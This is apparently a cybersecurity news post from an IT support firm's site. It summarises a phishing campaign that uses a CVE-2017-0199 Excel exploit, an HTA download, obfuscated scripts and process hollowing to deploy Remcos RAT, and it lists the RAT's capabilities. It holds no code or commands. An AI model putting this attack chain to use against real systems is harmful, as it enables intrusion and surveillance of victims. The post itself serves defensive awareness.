Now Hiring: Are you a driven and motivated 1st Line IT Support Engineer?

 

Call Anytime 24/7

 
Mail Us For Support
 
Office Address

Cybercriminals Use Excel Exploit to Spread Fileless Remcos RAT Malware.

cybercriminals malware attacks

Cybersecurity researchers have identified a new phishing campaign leveraging a fileless variant of Remcos RAT malware. This attack capitalizes on known vulnerabilities to remotely control victims’ computers and extract sensitive data.

Attack Overview

• Initial Vector: Phishing email with a purchase order-themed lure.
• Payload: Malicious Microsoft Excel document exploiting a remote code execution flaw (CVE-2017-0199).

Technical Details

• Excel Exploit: Document triggers the download of an HTA file (“cookienetbookinetcahce.hta”) from a remote server.
• HTA File: Encapsulated in layers of JavaScript, Visual Basic Script, and PowerShell code to evade detection.
• Execution: The HTA file retrieves and executes an executable file, followed by running another obfuscated PowerShell program.
• Process Hollowing: Final stage involves process hollowing to deploy Remcos RAT directly in memory.

Capabilities of Remcos RAT

• Information Harvesting: System metadata, file access, clipboard content.
• Remote Commands: Execute commands/scripts, manage services, edit Registry.
• Surveillance: Enable camera/microphone, screen recording, altering wallpaper.
• Disruption: Disable keyboard/mouse input.

Related Threats

• Docusign APIs Abuse: Fake invoices through legitimate Docusign accounts.
• ZIP File Concatenation: Bypassing security tools to distribute remote access trojans.

Conclusion: These advanced phishing campaigns underscore the need for heightened cybersecurity measures. Organizations should prioritize employee education on phishing tactics and maintain up-to-date security protocols to mitigate such threats.

Leave A Comment

Your email address will not be published. Required fields are marked *